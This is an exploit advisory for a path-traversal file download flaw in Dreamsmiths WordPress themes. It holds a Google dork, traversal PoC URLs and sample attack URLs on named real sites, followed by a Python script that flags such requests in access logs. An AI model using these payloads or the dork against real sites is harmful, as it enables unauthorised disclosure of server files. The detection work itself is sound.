WordPress Dreamsmiths Themes version 0.0.1 suffers from an arbitrary file download vulnerability.
# Exploit Title: WordPress Dreamsmiths Themes Arbitrary File Download
# Google Dork: inurl:/wp-content/themes/fiestaresidences/ inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/
# Date: 2018/01/08
# Exploit Author: IRaNHaCK Security Team
# Vendor Homepage: iranhack.com
# Software Link: http://www.dreamsmiths.com/
# Version: 0.0.1
# Tested on: 7, Kali
PoC:
Arbitrary PHP file download in all WordPress themes by Dreamsmiths:
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.php
site.com/wp-content/themes/optimus/download.php?file=../../../index.php
site.com/wp-content/themes/erinvale/download.php?file=../../../index.php
site.com/wp-content/themes/hsv/download.php?file=../../../index.php
Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
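Added detection example (not part of the advisory or the vendor's code): it scans combined-format web server access logs for requests to the theme `download.php` handler whose `file` parameter either climbs out of the theme directory or asks for a `.php` file, covering both the `../../../index.php` PoC and the `file=download.php` probe shown above. The log lines are constructed for this example; IPs and timestamps are made up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The theme download handler the advisory describes: /wp-content/themes/<theme>/download.php?file=...
DOWNLOAD_HANDLER = re.compile(r"^/wp-content/themes/[^/]+/download\.php$")

# Apache/Nginx combined log format; only the fields this check needs are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (IPs, hosts and timestamps are made up for this example).
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jan/2018:10:00:01 +0000] "GET /wp-content/themes/fiestaresidences/download.php?file=brochure.pdf HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.9 - - [08/Jan/2018:10:00:02 +0000] "GET /wp-content/themes/fiestaresidences/download.php?file=../../../index.php HTTP/1.1" 200 418 "-" "curl/7.58"
203.0.113.9 - - [08/Jan/2018:10:00:03 +0000] "GET /wp-content/themes/hsv/download.php?file=..%2F..%2F..%2Findex.php HTTP/1.1" 200 418 "-" "curl/7.58"
203.0.113.9 - - [08/Jan/2018:10:00:04 +0000] "GET /wp-content/themes/erinvale/download.php?file=download.php HTTP/1.1" 200 901 "-" "python-requests/2.18"
203.0.113.7 - - [08/Jan/2018:10:00:05 +0000] "GET /wp-content/uploads/2018/01/brochure.pdf HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
"""


def classify_request(target: str):
    """Return why a request target looks like download.php abuse, or None if it looks benign."""
    parts = urlsplit(target)
    if not DOWNLOAD_HANDLER.match(parts.path):
        return None
    for raw in parse_qs(parts.query).get("file", []):
        # parse_qs already decoded once; decoding again catches double-encoded traversal.
        decoded = unquote(raw).replace("\\", "/")
        if ".." in decoded.split("/"):
            return "traversal"      # climbing out of the theme directory
        if decoded.lower().endswith(".php"):
            return "php-source"     # fetching server-side source, e.g. download.php itself
    return None


def scan_log(text: str):
    """Return one finding per suspicious request; status 200 means the server served the file."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reason = classify_request(m["target"])
        if reason:
            findings.append({"ip": m["ip"], "target": m["target"],
                             "status": m["status"], "reason": reason})
    return findings
```

A 200 status on a flagged request means the handler actually served the file, so those entries should be treated as confirmed disclosure rather than a blocked attempt.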